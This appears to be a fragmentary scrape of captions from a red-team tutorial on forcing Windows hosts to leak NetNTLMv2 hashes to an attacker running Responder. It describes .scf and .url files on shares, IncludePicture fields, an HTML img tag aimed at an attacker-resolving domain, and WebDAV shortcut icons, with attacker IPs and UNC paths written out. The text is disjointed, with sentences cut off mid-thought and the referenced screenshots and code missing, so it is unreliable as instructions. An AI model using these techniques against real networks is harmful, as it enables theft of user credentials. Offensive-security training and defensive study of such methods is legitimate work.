responder will be listening on port 445:
Responder on our Kali box:
NetNTLMv2 hash is captured:
fa.scf file on the attacker controlled machine at 10.0.0.7 in a shared folder tools
low opens the share \\10.0.0.7\tools and the fa.scf gets executed automatically, which in turn forces the victim system to attempt to authenticate to the attacking system at 10.0.0.5 where responder is listening:
.scf attack is that the file could easily be downloaded through the browser and as soon as the user navigates to the Downloads folder, the user's hash is stolen:
link.url file is placed, the OS tries to authenticate to the attacker's malicious SMB listener on 10.0.0.5 where NetNTLMv2 hash is captured:
IncludePicture:
offense.local, you have a foothold in, and point it to your external server, say 1.1.1.1
Responder and listen for HTTP connections on port 80
<img src="http://vpn.offense.local"/>
http://vpn.offense.local resolves to 1.1.1.1 (where your Responder is listening on port 80), but only from inside the offense.local domain
offense.local domain
http://vpn.offense.local, which resolves to http://1.1.1.1 (where Responder is listening on port 80)
spotless when they are forced to authenticate to the malicious WebDAV when ls \\[email protected]\spotless.png is executed:
spotless via a shortcut icon that points to our malicious WebDAV at \\[email protected]\spotless.png: